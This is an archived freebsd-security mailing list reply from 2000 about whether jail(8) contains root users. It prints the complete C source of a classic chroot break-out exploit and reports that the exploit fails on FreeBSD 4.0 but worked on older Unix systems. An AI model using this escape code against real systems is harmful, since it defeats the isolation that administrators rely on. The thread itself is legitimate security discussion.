Skip site navigation (1)Skip section navigation (2) 
Date:      Fri, 12 May 2000 06:19:06 -0700
From:      Cy Schubert - ITSD Open Systems Group <Cy.Schubert@uumail.gov.bc.ca>
To:        Poul-Henning Kamp <phk@critter.freebsd.dk>
Cc:        Paul Hart <hart@iserver.com>, Adam Laurie <adam@algroup.co.uk>, freebsd-security@FreeBSD.ORG
Subject:   Re: envy.vuurwerk.nl daily run output 
Message-ID:  <200005121319.e4CDJev40777@cwsys.cwsent.com>
In-Reply-To: Your message of "Fri, 12 May 2000 10:00:11 %2B0200." <4226.958118411@critter.freebsd.dk>
next in thread | previous in thread | raw e-mail | index | archive | help 
In message <4226.958118411@critter.freebsd.dk>, Poul-Henning Kamp 
writes:
> In message <Pine.BSF.4.21.0005110953510.8386-100000@anchovy.orem.iserver.com>
> , 
> Paul Hart writes:
> >On Thu, 11 May 2000, Adam Laurie wrote:
> >
> >> If someone backdoors your system with an authorized key, and is
> >> confident they can gain root from a luser account, they don't need to
> >> go any further, and it's extremely likely that the change will go
> >> unnoticed *forever*
> >
> >But if you have hostile local users with root access, can you even trust
> >the output from /etc/security?
> 
> Yes, if you put them in a jail(8).

I was about to comment that anyone with root can break out of any 
chrooted environment including jail, however testing the break out of 
jail exploit (good thing I tested before I spoke), which BTW worked on 
FreeBSD-3 and numerous other platforms including Linux, Solaris, and 
Tru64-UNIX, appears to no longer work under 4.0 -- which is a good 
thing!  When did the FreeBSD chroot(2) get fixed?

Once again FreeBSD leads the way.

Following is the break-out-of-jail code.

 #include <unistd.h>
 #include <assert.h>

 const char *shell = "/bin/sh";
 const char *lowerdir = "/tmp";

 int main() {
        int i;

        assert(chdir("/") != -1);
        assert(chroot(lowerdir) != -1);
        for (i = 0; i < 32; i++)
                assert(chdir("..") != -1);
        assert(chroot(".") != -1);

        assert(execl(shell, shell, NULL) != -1);
 };


Regards,                       Phone:  (250)387-8437
Cy Schubert                      Fax:  (250)387-5766
Team Leader, Sun/DEC Team   Internet:  Cy.Schubert@osg.gov.bc.ca
Open Systems Group, ITSD, ISTA
Province of BC





To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message

Want to link to this message? Use this URL: <https://mail-archive.FreeBSD.org/cgi/mid.cgi?200005121319.e4CDJev40777>